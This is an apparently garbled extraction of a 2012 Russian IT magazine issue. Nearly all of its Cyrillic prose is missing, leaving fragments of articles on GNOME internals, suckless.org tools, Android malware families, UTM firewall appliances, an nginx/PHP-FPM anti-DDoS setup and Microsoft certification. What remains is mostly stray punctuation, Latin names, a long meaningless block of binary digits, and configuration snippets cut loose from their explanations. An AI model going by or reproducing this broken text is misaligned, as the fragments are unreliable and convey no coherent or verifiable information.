4.1.2.
4.1.3.
4.2.
4.3.
4.4.


,

CDN




Heartbeat, CARP-

3
5.
5.1.
5.2.
5.2.1.
5.2.2.
5.2.3.
5.2.4.
5.3.
5.3.1.
5.3.2.
5.3.3.
5.4.
5.5.

100


Share-nothing

6.
6.1.
6.2.
6.3.

5
7.
7.1.
7.2.
7.3.
7.3.1.
7.3.2.
7.3.3.
7.4.
7.5.
7.6.
7.6.1.
7.7.
7.8.



(, NoSQL)

6
8.
8.1.
8.2.
8.3.

9.
9.1.

Dev-ops ( )

9.2.
9.3.
10.
10.1.
10.2.
10.3.




Push- (, ,
)

07 /162/ 2012


.

.

-,
.
.
TSW ,
. ,

, .

TSW.
-, ,
, . -


( )

. , . 14/2
(495) 231-4383
. , . 29
(499) 724-8044

-, . 1
(812) 603-2610


TSW.
,
( ),
.

( ,
),
. ,
TSW,
.

. , . 10, . 32,
(495) 231-2363
www.kolrad.ru

www.allrad.ru
(495)730-2927/368-8000/672-7226
www.prokola.net
(812)603-2610/603-2611

UNIXOID

GNOME: GTK+
SHELL
GNOME ,
, .
, GNOME ,

.

010101010101000100100101010110010001001000
0100010010010101011001
001000100100011110101110001110110101001001
(execbit.ru)
10001111010111000111011
011010100100100111101010101010100010010010
0010011110101010101010
010001001001010101100100010010001111010111
0101010101000100100010101011001000100100
1000111101011100011101101010010010011110101
0100010010001111010111000111011010100100
100100111101010101010100010010010101011001
1101010010010011110101010101010001001001
1001010101100100010010001111010111000111011
1000100100101010110010001001000111101011
1011100011101101010010010011110101010101010
000111101011100011110110101001001001111010
101010101010100010010010101011001000100100
11011010100100100
0010011110101010101010001001001010101100
100100010010001111010111000111011010100100
01010001001001010
01010101100100010001000111101011100011101
1101101010010010011110101010101010001001001
001000111101011100
1110001110110101001001001111010101010101
0101000100100101010110010001001000111101011
0010010011110101010
111101010101010100010010010101011001000100100011110101110001110
101010101010001001001010101100100010010
0100011110101110001110110101001001001111010
010010101011001000
010110010001001000111101011100011101101010010010011110101010101
001000100100011110
010010011110101010101010001001001010101100
1010111000111011010
00111011010100100100111101010101010100010010010101011001000100
011010100100100111
111010101010101000
101010100010010010101011001000100100011110101110001110110101001
011001000100100011
001001000111101011100011101101010010010011110101010101010001001
0111011010100100100
101001001001111010101010101000100100101010110010001001000111101
010101000100100101
01001001010101100100010010001111010111000111011010100100100111
0100100011110101110
0111101011100011101101010010010011110101010101010001001001010101
001111010101010101000100100101010110010001001000111101011100011
010101100100010010001111010111000111011010100100100111101010101
100011101101010010010011110101010101010001001001010101100100010
101010101000100100101010110010001001000111101011100011101101010
00010010001111010111000111011010100100100111101010101010100010
101010010010011110101010101010001001001010101100100010010001111
000111011010100100100111101010101010100010
000100100101010110010001001000111101011100011101101010010010011
110001110110101001001001111010101010101000
0001001001010101100100
0011110101110001110110101001001001111010101010101000100100101010
0100010010010101011001
0111000111011010100100100111101010101010100
10011110101010101010001001001010101100100010010001111010111000
010111000111011010100100100111101010101010
010100010010010101011
101010110010001001000111101011100011101101010010010011110101010
1111010111000111011010100100100111101010101
010101010001001001010101100100010010001
110001110110101001001001111010101010101000100100101010110010001
0001111010111000111011010100100100111101010
101010101010001001001010101100100010010
010101010100010010010101011001000100100011110101110001110110101
1101010101010100010010 01010101100100010
0010001111010111000111011010100100100111101
010001001000111101011100011101101010010010011110101010101010001
0010010001111010111000111011010100100100111
0111101010101010100010 01001010101100100
11010100100100111101010101010100010010010101011001000100100011
0100010010001111010111000111011010100100100
0100111101010101010100 01001001010101100
10001001001010101100100010010001111010111000111011010100100100
1100100010010001111010111000111011010100100
0100100111101010101010100010010010101011
101011001000100100
100011110101110001110110101001001001111010101010101000100100101
010010010011110101010101010001001001010
01010101100100010
010110010001001000111101011100011101101010
100100111101010101010100010010010101011001000100100011110101110
0101010110010001001000111101011100011101101
11010100100100111101010010101010001001001
001001010101100100
00101010110010001001000111101011100011101101010010010011110101
0100101010110010001001000111101011100011101
100011110101110001110110101001001001111010101010101000100100101
1101101010010010011110101010101010001001
001001001010101100
101110001110110101001001001111010101010101000100100101010110010
0100100101010110010001001000111101011100011
100100011110101110001110110101001001001111010101010101000100100
110101010101010001
010001001001010101
101010101010100010010010101011001000100100011110101110001110110
01010001001001010
000100100011110101110001110110101001001001111010101010101000100
011110101010101010
110010001001000111101011100011101101010010010011110101010101010
001000100100011110101110001110110101001001001111010101010101000
010101010001001001
11011010100100100111101010101010100010010010101011001000100100
011001000100100011110101110001110110101001001001111010101010101
01010101010001001
01010001001001010101100100010010001111010111000111011010100100
01011001000100100011110101110001110110101001001001111010101010
101010101010100010
100100011110101110001110110101001001001111010101010101000100100
011110101010101010
01010101100100010010001111010111000111011010100100100111101010
100100100111101010101010100010010010101011001000100100011110101
01001010101100100010010001111010111000111011010100100100111101
001001111010101010
001001010101100100010010001111010111000111011010100100100111101
00100100101010110010001001000111101011100011101101010010010011
101011100011101101010010010011110101010101010001001001010101100
01000100100101010110010001001000111101011100011101101010010010
10101000100100101010110010001001000111101011100011101101010010
01010101000100100101010110010001001000111101011100011101101010
10101010101000100100101010110010001001000111101011100011101101
11101010101010100010010010101011001000100100011110101110001110
00111101010101010100010010010101011001000100100011110101110001
00100111101010101010100010010010101011001000100100011110101110
0010010011110101010101010001001001010101100100010010001111010
01010010010011110101010101010001001001010101100100010010001111
01101010010010011110101010101010001001001010101100100010010001
11101101010010010011110101010101010001001001010101100100010010
10001110110101001001001111010101010101000100100101010110010001
011100011101101010010010011110101010101010001001001010101100100
10101110001110110101001001001111010101010101000100100101010110
011110101110001110110101001001001111010101010101000100100101010
100011110101110001110110101001001001111010101010101000100100101
100100011110101110001110110101001001001111010101010101000100100
00010010001111010111000111011010100100100111101010101010100010
10010001001000111101011100011101101010010010011110101010101010
010110010001001000111101011100011101101010010010011110101010101
10101011001000100100011110101110001110110101001001001111010101
10010101011001000100100011110101110001110110101001001001111010
010010010101011001000100100011110101110001110110101001001001111
10001001001010101100100010010001111010111000111011010100100100
01010001001001010101100100010010001111010111000111011010100100
10101010001001001010101100100010010001111010111000111011010100

GNOME 1997 KDE,


Qt.

, KDE, 2000 Qt , GNOME
.
Linux. GNOME
, Ubuntu, Fedora,
OpenSUSE, .
, 3.0,
, , GNOME ,

.
UNIX ?
.

GNOME .
,
. GNOME
GTK ;
, CORBA,
D-Bus;
;
,
GNOME 3.

GNOME
. ,
KDE, GNOME

, , . , GNOME GTK,
Gimp,

Metacity,

102

-
GStreamer, , , ffmpeg. Firefox

Epiphany.
GNOME

,

.
,
, libgnome .

,
, ,
.
GNOME
,

.
,

.

07 /162/ 2012

GNOME
,
, .

,
GLib, GObject, libgnome, D-Bus
GVFS. GNOME,
.

GLib,
libc. GLib
,

. ,
,
,
, , , .ini-
.
GLib
GTK+,
,

. ,
GLib MC.
GLib
GNOME GObject.
(),
GNOME, GTK+.
GObject
( ),
, ,
.
GLib GObject
libgnome,
,

.
GLib-
, , ,
.
,
GLib
, GNOME.
GNOME
D-Bus,
. D-Bus


freedesktop.org UNIX. D-Bus
RCP CORBA,

07 /162/ 2012

GNOME ,
DCOP, KDE 3.
D-Bus
Linux-,
udev,
.
D-Bus GNOME
GVFS,
, FUSE.
GVFS , API GIO
. GVFS GIO ,
FTP- SMB-.
GVFS GNOME
GnomeVFS,
,
GnomeVFS.


GNOME
,
GTK+,
Pango, Cairo, , ATK, Clutter WebKit.
GTK+,

GIMP, GNOME

. GTK+
(): , , ,
,
.
2.8, GTK+

Cairo,
. Cairo
X Window, -

Microsoft Windows, BeOS, OS/2, Linux


Framebuffer
, PNG,
PDF SVG.
GTK+ Pango,
. Pango

, ,
( ,
). Pango GTK+;
, ,
Firefox GNOME.
GTK+ ATK,

.

(,
)
- .

,
, Clutter. Clutter

GNOME Shell,
.


. OpenGL
,
.
Clutter Intel
Moblin ( MeeGo
Tizen), .

GNOME

Cinnamon GNOME 3

103

UNIXOID
GNOME 1.0

WebKitGTK+ WebKit, GTK+.


- , Epiphany,
Evolution GNOME Shell.
GNOME Shell, GNOME 3,
JavaScript
Gjs, SpiderMonkey GObject.

GNOME
,
. : PulseAudio, Canberra
GStreamer.
PulseAudio ,
, ,
, , , .
,
,

. PulseAudio GNOME
ESD,
Enlightenment.
PulseAudio GStreamer,
,
- . GStreamer
,
.

,
PulseAudio (ALSA, OSS,
), ,
X Window. API,

.

Canberra.

104

GNOME 3.0

GNOME ,


(IM). : Avahi,
GUPnP, NetworkManager Telepathy.
GNOME
NetworkManager, , Ethernet-,
Wi-Fi-,
Bluetooth-. NetworkManager

, ,
DHCP IP- DNS-. NetworkManager
,
GNOME

.
GNOME Avahi,
Zeroconf,
IP-
. Avahi
, IP- 169.254.* (
DHCP-),

.local
UPnP,
GUPnP. Avahi
/
, ,
.

Telepathy,

. Telepathy
, Empathy,
,

, ,
, , .
, Sudoku
Tetris ,
AbiWord ( AbiCollab) . Telepathy

.


,

,
GNOME
.

Multimedia

User Interface

Communication

Data Storage

Utilities

GTK+

Cairo

Clutter

GStreamer

Telepathy

EDS

Champlain

ATK

Pango

Webkit

Canberra

Avahi

GDA

Enchant

Pulseaudio

GUPnP

Tracker

Poppler

Core
GIO

Glib

GObject

Desktop Integration

System Integration
upower

GeoClue

udisks

policykit

packagekit

libnotify

gnome-keyring

GNOME 3.0

07 /162/ 2012

EDS,
GDA, Tracker, GNOME Keyring. EDS (Evolution
Data Server) ,
, .

, .
, Empathy

Empathy, -
IM-. , , ,
. GDA
(GNOME Data Access)
,

.
Tracker GNOME .

KDE4
API Nepomuk, ,
. Tracker ,
,
.
,
,
, .
,
GNOME,
GNOME Keyring,
.
,
, , KeePassX ,

. ,
- GNOME Keyring ()
,
, Keyring,

.


GNOME ,
.
: UPower, UDisks PolicyKit.
UPower
sysfs,

D-Bus,
( , ).
GNOME
, ,

07 /162/ 2012

INFO

xine

aRts

KDE 3

libao
aRts

ALSA

PulseAudio

GNOME (libgnome)

ESD

MPlayer

GNOME ,


HIG (Human Interface Guidelines),

Mac OS X KDE4.

libao

PulseAudio

libxine Pulse

libalsa Pulse

UNIX/NCP

libgnome

EsounD

Zerconf

HAL

PulseAudio

ALSA

RTP

OSS

2000

GNOME Foundation.

GNOME

C#,

ALSA

RTP

GNOME

1997


KDE,

QT.

HAL

OSS

HAL


GNOME
1999 .

Linux

TCP/IP

ALSA/OSS


PulseAudio

,
RTP

PulseAudio

,

. UDisks ,
. ,
,
UDisks ,
.

. -
UPower UDisks HAL,
udev HAL
,
freedesktop.org.
,

UPower UDisks, -

2005

GNOME

.



GNOME 3

GNOME 2,

Linux Mint
GNOME 3
Cinnamon
(cinnamon.linuxmint.
com).

, GNOME
freedesktop.org
PolicyKit (polkit). D-Bus

.

Linux, GNOME ,
,
. , freedesktop.org,
,
,

- . z

105

UNIXOID

(execbit.ru)



SUCKLESS.ORG

Linux-,
,

,
,

- .
suckless.org
,
,
.

106

UNIX
,
.
2
8 , , , ,
. ,
, , ,
HIG rich user interface,
,
.
; UNIX

, ,
.
.
,
UNIX.

.
, ,
UNIX?

SUCKLESS.ORG
, dwm, dmenu surf. ,
,
,
suckless.org.
10 ,



.
,
. ,
dwm (dynamic window manager)
,
, , , ,
.
,

. , dwm
dmenu,
,
,
.
, /usr/bin (
)
.

surf,
,

dwm
( )
tabbed,
(

07 /162/ 2012


wmii

dmenu ,

Acme Plan 9, wmii

fluxbox).
st.

,
, ,

.
suckless.org
.
:
wmii , Acme Plan 9 Oberon;
dwm ,
wmii;
surf -
WebKit;
st ,
;
9base UNIX-,
Plan 9;
dmenu ,
,
;
ii IRC-, ;
sandy , ,
;
slock
;
svkb ;

07 /162/ 2012

tabbed .

WMII
wmii (Window Manager Improved Improved)
X Window,
Acme
Plan 9
/
.

suckless.org,

, Google Code: code.google.com/p/wmii.
wmii
, (,
wmi) ,
,
.
suckless.org
,
,
.
wmii ,

,

.
. -, wmii , ,

. -,
wmii
,
.
:
.
,
,
,
,
, :
,
.

, ,

. ,
, .

: , ,
jabber-,
, .
DE, , ,

, ,
,

107

UNIXOID
(
16:9).
,
?
,
. ,
, jabber-
.
,
, .
, .
, Gimp
. wmii
.
, wmii, ,

( , ),

. , ,
,
. ,
, jabber-
work web.
,
. , wmii

.
wmii
Plan 9,

.
wmii
,
. ,
, :

wmii,
,
, .
, dwm

.
wmii, ,
,
. dwm
,
, ,
,

X Window:
$ xsetroot -name `date`

,
,
,
.

,

config.h
,
.
,
. dwm
,

.

SURF
- surf (surf.suckless.org)
, . WebKit
- ,
.
surf , -,
. surf
,
, .

, dmenu,
<Ctrl+g>.

, dwm wmii,
INFO


suckless.org ,

UNIX;
,


.

$ wmiir read /tag/sel/index

0x1000004
:

dwm ,

$ echo test+terms | wmiir write \


/client/0x1000004/tags

suckless.org

-
werc,
sh-,

Mercurial.

suckelss.org software that sucks less

,
,
(



).

:
$ echo "send sel left" | wmiir write \
/tag/sel/ctl

, ,
.

DWM
dwm (dwm.suckless.org)
suckless.org
.
2000 ,
, -

108

, dwm

07 /162/ 2012

, dzen

surf Google

st

tabbed. ,
CSS- cookies,
,
( - ?)
.
sh,
.
, surf -
. , Google surf
:

.
, awk, cat, dd, diff, du, echo, ls, mkdir,
.
9base - ,

sta.li.

. ,
, :

#!/bin/sh
query=`echo $@ | tr ' ' '+'`
surf http://www.google.ru/search?q=$query



surf.

ST
suckless.
org st (st.suckless.org), ,
, . VT100, 256 ,
UTF-8, / X11, .
, ,
10 000 ,
config.h.
st
,
, , suckless.org,



, xterm.

9BASE
9base UNIX,
,

Plan 9, Linux/
FreeBSD/MacOSX plan9port. 9base ,
-

07 /162/ 2012

STA.LI
suckeless.org sta.li
(STAtic LInux),
UNIX-,
KISS ,
.

,

. .
sta.li ,

, Linux.

, ELF,
,
(,
a.out). , ,
,
,
,
.


, (, USB-).
(initrd, initramfs),
, ,
RAM-. , , (
, ,
256
128 ).

lilo. ,
-
,
rsync, ,
-

/bin
/boot
/dev
/etc
/svc ,
/home
/root
/var
(spool, run, log,
cache)
/share man-,

/devel


/usr, /sbin, /usr/local , Linux, .


, ,
,
-,
UNIX KISS
. ,
: UNIX/
Linux
,

. z



,
suckless.org,
. , ,
e-mail- dmc (hg.suckless.org/dmc),

dzen (goo.gl/8kOGN)
passman (goo.gl/HrMpj).

109

UNIXOID

(androidstreet.ru)

-

Google
. ,
,
,

Google Play.
,
Android ?

110

, ,

ANDROID


Android 2010 Trustwave DEF CON.
- Android
FakePlayer,
,
.

Android
,
. 2011
, 65%
Android,

.


, Google
,
Android
.



Android ,
.
-,
.

,
; -,

07 /162/ 2012

Android

, ; ,

AirPush, Android; ,
, .

, , Google Play (
Android Market).
? .
-.
. -
, ,
. -
(FakePlayer
13 ),


,
.
(Opera Mini, ICQ, Skype, Angry
Birds),
, .
- ,
,
.
malware,
Android.SmsSend.

07 /162/ 2012

. ,

, ,
.
Android Android.
Geinimi,
. Geinimi
Lookout Mobile
Security 2010 .
,

, IMEI IMSI
.
,
(,
).
Geimini
,
, . Geinimi
,

.
. ,
Google Play. ,
,
,

(
).
,

.
,
,

. , :

(
).
.
, .
,
,


.
,
,
(, Skype),
.

,

,
(Adware.Airpush, Adware.Leadbolt,
Adware.Startapp ).

111

UNIXOID

Android Android


API
Android, . , ,
, -
.
, ,

Google Play, .
,

Android.
.
2011 Android 2.3
- Android,
SD
. ,
,
. ,
.
, 2012-, ,
, , ,
SD-.
,
, SD- ,
.
,
, ,
, -.
-

112

, .
, , Google,
SD- ,
,
.
, Google ,

. , -
, .
2011
Trustwave
Android API. ,
,
,

. ,
,
,
. ,
Facebook,
Facebook
. -
,
, , .

Android
2011 .
,

, HTC, Motorola
Samsung. ,
, Android,
, . -

13 , 11
.

.
Android.
SmsHider,
, .
Android,
:
,
,
.


,

.

AOSP, ,
,
;
,

. CyanogenMod,

.
, TapLogger,
, ,
. ,
.

.

. , , ,

. ,
,
, ,
. ,

Android

07 /162/ 2012

Lookout DroidDream

( )

, ,

.


,
. , Linux
root
,
( Android.
Anzhu), ,
(DBF
BootKit ,
).
,
, .
Exploid, RageAgainstTheCage,
KillingInTheName, ZimperLich, GingerBreak
,
hotplug, bionic .

/system/bin/su,

root-, ,

root, .
, root , ,

. ,

.
, .


Android-, Play Market,

.
.
.
,
Skype,
1500
Android, Sensation
. ,
, -,
,
.
-.

Android-. Crusewind,


,
.
.
Google Play. Google
( Android Market).
2011 , 21 DroidDream
.
,
. ,

07 /162/ 2012


,

Google Play, . .
. .
, .
,
.
.
. -,
.
,

.

113

UNIXOID
MYAndroid Protection Antivirus
NQ Mobile Security
Zoner AntiVirus Free

Android.Haktool.Faceniff.A 2012

Google ,

56, 200 000
. ,
Symantec, Samsung Lookout,
, Google
Android Market Security Tool,
. Symantec
13 , Android.
Counterclank,
Google Bouncer
,
.

?
, , .
? :
99% ,
, Google Play,
Amazon Appstrore GetJar. ,

, ,
,
.
-
( ,
Google
, ), ,
, , . :
, Android
,
,
AV-Test ( 90% ):
avast! Free Mobile Security
Dr.Web anti-virus Light
F-Secure Mobile Security
IKARUS mobile.security LITE
Kaspersky Mobile Security (Lite)
Lookout Security & Antivirus
McAfee Mobile Security

, ,
: , , , .

, ,
, . , ,
,
.

CyanogenMod MIUI, .
,
. CyanogenMod
MIUI,
,
(MIUI ,
).

Android ,
. ,
, ,
,
, , Android 2011 .
,
,
,
. z

TapLogger

114

07 /162/ 2012

SYN/ACK
SYN/ACK

grinder (grinder@synack.ru)


UTM-
,

. IT-, UTM
,
.

116
0116

07
07 /162/
/162/ 2012
2012

UTM?

,
.
,
.
.

, UTM (Unified Threat Management,
).
UTM :
DPI (Deep Packet Inspection), (IDS/IPS), , .
VPN,
, ,
.
, .
, .
UTM, , , / .
UTM
2530% ( firewall),
,
, . ,
,
, , .
,
,
. :
UTM-
, IPS, VPN
. UTM
, ,
. ,
,
, CPU.
,
.
opensource- (Untangle, pfSense, Endian

- FortiGate

07
07 /162/
/162/ 2012
2012

), .
.

FortiGate
: FortiGate
: fortinet-russia.ru
:
:

Fortinet, 2000 , UTM-,



(FortiGate-30) (FortiGate-5000).
FortiGate ,
.
, IDS/IPS, ,
, - .
DLP, VoIP, , WAN, ,
, PKI .
( ).
, ,
. -
75 , ,
. , .
(Skype, P2P, IM )
, traffic shaping
. .
LAN
WAN-,
RIP, OSPF BGP.
: ,
NAT, FortiGate
. Wi-Fi FortiWiFi.
( Windows, Android), ,
- FortiClient,

firewall Check Point

117
0117

SYN/ACK
SYN/ACK
(firewall, , SSL IPsec
VPN, IPS, -, ). Fortinet
FortiManager FortiAnalyzer.
- , FortiGate/FortiWiFi FortiExplorer
( Win Mac OS X),
GUI CLI ( Cisco).
FortiGate FortiASIC, , .
FortiOS.

Check Point UTM-1


: Check Point UTM-1
: rus.checkpoint.com
:
:

Check Point
UTM: UTM-1, UTM-1 Edge ( ) Safe@Office ( ).
: , IPS, , , SSL VPN . , (
200 ),
IM, P2P- Skype. -
URL-, Check Point , . HTTP/FTP/SMTP/POP3/IMAP, . UTM-1
W Wi-Fi. IPS
:
, ,
. , 10%
, .

UTM. - IP-, , .
OSPF, BGP RIP, -

grinder (grinder@synack.ru)

(, RADIUS,
SecureID ), DHCP.
, Software
Blades ( ) ,
. , Web Security
( -), VoIP ( VoIP),
Advanced Networking, Acceleration & Clustering ( ). ,
Web Application Firewall Advanced Streaming Inspection,
Web Security, , TCP-,
, ,
.
Telnet/
SSH.
Check Point SmartCenter,
Security Management Architecture
Check Point, . SmartCenter , ,
LDAP, , .
UTM Check Point
Update Service.

ZyWALL 1000
: ZyWALL 1000
: zyxel.ru
:
:

, ZyXEL, -
UTM,
ZyWALL USG 50/100/300/1000/2000,
( 500 ).
ZyXEL . , ZyWALL 1000 ,
. , IDS/IPS, (Blue
Coat Commtouch), VPN (IPsec,

- ZyWALL

118
0118

07
07 /162/
/162/ 2012
2012

Untangle

SSL L2TP over IPsec VPN). ,


. - IPsec
VPN SSL VPN DES 56 .
(IP, ).

IM, P2P, VoIP, mail . IDS , , , DDoS . (Anomaly Detection
and Prevention) 2-
3- OSI, , 32 . End Point Security
, ,
firewall, , , .
, .
.
LDAP, Active Directory, RADIUS, . VoIP SIP .323
firewall NAT, VPN-.

( Commtouch, VPN)
. CLI -.
.

Untangle Server
: Untangle Server 9.2.1 ruiser
: untangle.com
: GPL
:
: x86, x64
:
Pentium 4 AMD, 1 RAM, 80 HDD, 2 NIC

*nix- UTM,
. :
,

07
07 /162/
/162/ 2012
2012

Untangle

, , ,
. , opensource-.
Untangle, ,
2008 , . Debian, .
Untangle Gateway
( 300 )
Forefront TMG
.
, Untangle Server. 5000 .
Untangle
. -
,
, . (Premium, Standard, Education Premium, Education Standard
Lite), ,
: Filter Services.
opensource- Lite,
13 ,
spyware, , , , , IDS/IPS, OpenVPN,
(Captive Portal). opensource, Snort, ClamAV, SpamAssasin, Squid.
, Untangle : , NAT, DMZ, QoS, DHCP- DNS-.
Reports, Lite,

UTM
DPI,
(IDS/
IPS), ,

119
0119

SYN/ACK
SYN/ACK

grinder (grinder@synack.ru)

: , ,
, ; e-mail PDF, HTML,
XLS, CSV XML.
:
Failover, ,
Active Directory,
. , . ,
Untangle.
,
Java,
. Untangle
*nix, ,
. ,
, .

Endian Firewall
: Endian Firewall Community 2.5.1
: endian.com/en/community
: GPL
: x86
: CPU 500 , 512 M RAM, 2 HDD

Endian Firewall
, ,
. . GPL,
ISO- Community
Edition .
CentOS Linux ,
, IDS/IPS, HTTP/FTP/POP3/SMTP-, ,
, - -, .
VPN OpenVPN IPsec . 20 , blacklist .
ACL,
, , IP, . , , .
e-mail .
, Active Directory, LDAP

Snort Endian Firewall

RADIUS. VLAN,
QoS; SNMP. ClamAV,
Sophos.
- .
,
, (LAN, Wi-Fi, DMZ).
IP-, MultiWAN.
RED,
ORANGE, BLUE GREEN, firewall ,
.
, ,
.

, UTM , , ,
LAN.
.
OpenSource Endian Firewall Untangle. z
INFO

UTM

KERIO CONTROL

UTM (Charles
Kolodgy) IDC (International Data Corporation) Worldwide
Threat Management Security Appliances 2004-2008
Forecast ( 2004 ),

,
.

(firewall, DPI ), ,
UTM-,
.

Kerio Control (kerio.ru/ru/control)


. Kerio WinRoute Firewall
,
, .
UTM-,
NAT -, (
), , - -
(53 ), ,
, WAN, VPN-,
. Kerio Control Windows,
.
-.

120
0120

UTM

firewall,

.

07
07 /162/
/162/ 2012
2012

SYN/ACK
SYN/ACK

(execbit.ru)


NGINX + PHP-FPM +
TEST-COOKIE + GEOIP +
NAXSI
122
0122

- Apache
.
nginx ,


, -.
,
?

07
07 /162/
/162/ 2012
2012

, ,
-,
.
, ,
PHP, DDoS
. FastCGI-
Apache suexec suphp,

nginx.
FastCGI- PHP-FPM,
. PHP-
, .
DDoS testcookie-nginx-module,
, HTTP cookie .
geoip,
IP- .
,
.
Debian (Ubuntu),
- Arch Linux, FreeBSD.
.

NGINX, MYSQL, PHP-FPM


nginx, MySQL PHP:
$ sudo apt-get install mysql-server mysql-client \
php5-fpm php5-mysql nginx

nginx:
# vi /etc/nginx/nginx.conf
#
#
#
worker_processes 4;
# gettimeofday(),
#
timer_resolution 100ms;

}
http {
#
include
/etc/nginx/mime.types;
access_log /var/log/nginx/access.log;
# keepalive-
# 2
keepalive_timeout 2;
#
# ( Debian-like
# )
include /etc/nginx/sites-enabled/*;
}


,
. : /home/
_/, ,
www logs, , -, .

IP , www , ,
- .
Apache, nginx .
nginx ,
include ( ).
, :
# vi /etc/nginx/sites-avalible/template
server {
listen 80;
server_name _HOSTNAME_;
access_log /home/_USERNAME_/logs/_HOSTNAME_.access_log main;
error_log /home/_USERNAME_/logs/nginx/_HOSTNAME_.access_log info;
root /home/_USERNAME_/www/_HOSTNAME_;
}

events {
# ,
#
worker_connections 4096;


, /etc/nginx/
sites-enabled/. :
UNIX-,
www-users,
www logs.
,
, _HOSTNAME_ ,

nginx.conf

PHP-FPM

error_log
pid

/var/log/nginx/error.log;
/var/run/nginx.pid;

07
07 /162/
/162/ 2012
2012

123
0123

SYN/ACK
SYN/ACK

(execbit.ru)

fastcgi_param PATH_INFO $fastcgi_script_name;


include /etc/nginx/fastcgi_params;
}

CGI- , ,
/var/run/php5-fpm/_USERNAME_.sock,
PHP-FPM.
PHP,
:
nginx + PHP-FPM Apache + mod_php

_USERNAME_ ( ), www . /etc/nginx/sites-enabled/,


- . , , .
, ( ssh-)
-,
PHP MySQL. FastCGI
, PHP-

.
, CGI-
PHP-FPM (PHP FastCGI Process Manager),
PHP- PHP- . ,
, (
):
# vi /etc/nginx/sites-avalible/template
location ~ \.php$ {
try_files $uri =404;
fastcgi_pass unix:/var/run/php5-fpm/_USERNAME_.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME \
$document_root$fastcgi_script_name;

# vi /etc/php5/fpm/template
[_USERNAME_]
# UNIX-
listen = /var/run/php5-fpm/_USERNAME_.sock
#
listen.owner = _USERNAME_
listen.group = www-users
listen.mode = 0600
# ,
# PHP-
user = _USERNAME_
group = www-users
#
pm = dynamic
#
pm.max_children = 50
# ,
pm.start_servers = 20
#
#
pm.min_spare_servers = 5
pm.max_spare_servers = 35


. ,

- NGINX NAXSI
Naxsi (Nginx Anti XSS SQL Injection)
Web Application Firewall nginx,
, -, SQL
Injections, Cross Site Scripting, Cross Site Request Forgery, Local &
Remote File Inclusions. ,
Naxsi , ,
,
HTTP-. ,

404. :
. ,
.
2011- Google
Code (naxsi.googlecode.com),
OWASP.
Linux ( , Debian/Ubuntu) FreeBSD.
nginx (--add-module=../naxsi-x.xx/naxsi_src,

124
0124

naxsi ).
http include /etc/nginx/naxsi_core.
rules, .
location
( default_location_config.example).
, , CheckRule
. Naxsi
whitelist, .
LearningMode Naxsi
( LearningMode Naxsi ,
,
). ,
CheckRule .
, ,
rules_generator.py,
WL.
(grinder@synack.ru)

07
07 /162/
/162/ 2012
2012

Wiki-, PHP-FPM

UNIX-
,
/etc/php5/fpm/pool.d/_.conf
PHP-FPM /etc/init.d/php5-fpm reload. , Wordpress,
PHPMyAdmin, Drupal . nginx
- .

NGINX DDOS
- , . -,
nginx,
(][_07_2010). -, - DDoS. ,
, DDoS - ,
, . SYN/ACK UDP iptables,
. DDoS-,
-, ,
(HTTP-). , ,
.
-
, , ,
. ,
PHP, eAccelerator
( ),

PHP-FPM

, .
. , .
, ,
DDoS- .
,
, 90% ,
cookie,
JavaScript HTTP-.
testcookie-nginx-module.
,
GET-
cookie. -
,
cookie, .

, URL.
nginx :
- . :
$
$
$
$
$
$
$
$

sudo apt-get install build-essential


cd /tmp
wget http://goo.gl/Mh7IJ
wget http://goo.gl/gyvs3 -O test-cookie.tar.gz
tar -xzf nginx-1.2.0.tar.gz
tar -xzf test-cookie.tar.gz
cd nginx-1.2.0
./configure --prefix=/usr/local \
--add-module=kyprizel-testcookie-nginx-module-*
$ make
$ sudo apt-get remove nginx

nginx-testcookie-module ( JavaScript JavaScript)

07
07 /162/
/162/ 2012
2012

125
0125

SYN/ACK
SYN/ACK

(execbit.ru)

$ sudo make install

DDoS . DDoS
,
. , ,
IP- . ,
,
.
, , geoip.
nginx,
. , IP- :

nginx:
$
$
$
$
$
$

cd /tmp
wget http://goo.gl/H08BC
cd /etc/init.d/
sudo tar -xjf /tmp/nginx-init-ubuntu_v1.2.1.tar.bz2
chmod +x nginx
sudo update-rc.d -f nginx defaults

, nginx , testcookienginx-module - ( http):


# vi /etc/nginx/nginx.conf
http {
#
testcookie on;
# cookie
testcookie_name BPC;
# , cookie
testcookie_secret keepmesecret;
#
testcookie_session $remote_addr;
# GET- cookie
testcookie_arg attempt;
# cookie
testcookie_max_attempts 3;
# GET-
testcookie_get_only on;
}

$ cd /etc/nginx/
$ sudo wget http://goo.gl/hzB5W

IP- nginx
( http):
geoip_country /etc/nginx/conf/GeoIP.dat

:
if ($geoip_country_code = CN) {
return 444;
}


.
, testcookie off;
/etc/nginx.d/sites-enabled/ (
,
,
). . doc/usecases.txt ,
, ,
AES-128 JavaScript-.
.

CN ,
, 444 -.
,
.
.

nginx -
, . Apache,
. PHP-FPM -DDoS
,
, . z

WWW



server_name_in_redirect off;
listen 80;
server_name _;
access_log /var/log/nginx/$host.access_log main;
error_log /var/log/nginx/logs/$host.access_log info;
root /var/www/$host;

,

,
:
# vi /etc/nginx/sites-enabled/default
server
{
if ($host ~* www\.(.*))
{
set $host_without_www $1;
rewrite ^(.*)$ http://$host_without_www$1/ permanent;
}

126
0126

}

/var/www/.
,
mkdir /var/www/exemple.com,
.

habrahabr.ru/
post/139931/

testcookienginx-module
.
habrahabr.ru/
post/141989/
cookie
Flash.

WARNING

nginx

.

07
07 /162/
/162/ 2012
2012

SYN/ACK
SYN/ACK

(irud@live.ru)

MICROSOFT
FAQ

,
,

.
128
0128

2012
07
06 /162/
/161/ 2012

Drupal

?

.
Microsoft .
- ( MCM/MCA) , ,
, . ,
-
.
( MCTS/MCITP).
,
-
. , .


,

,

MCTS/MCITP,
. Prometric ( -)
.
.
,
( ).
Prometric,
, 500600
.
, ,
. , , . .
,
. ,
Finish.
.

?
, , . :
. , ,
. , , -
,
, .
.
: ,
, .
,
, - . , ,
,
, .
, . ,
,
. ? ,
.
,
.

?
, , . ,
,
, .

?
-,
. ,

Microsoft

2012
07
06 /162/
/161/ 2012

129
0129

SYN/ACK
SYN/ACK

, Microsoft

.
, .
, ,
-.

?
-
.
, , ,
.
, , , .
, , ,
,
.

?
Microsoft . , , MCSE, ,
WSUS.
, NAP
Microsoft,
90% . , .
? , . : ) ; ) ;
) ; ) ? , .
, , : ,
. , ,
, ,
. , ,
, .
. , ,
, - .

(irud@live.ru)

Microsoft


. .
Present Simple
. -,
, ,
, .


?
, . ,
, ,
. ,
.
. , , ,
.
, ,
, . , , .
,
, . ,
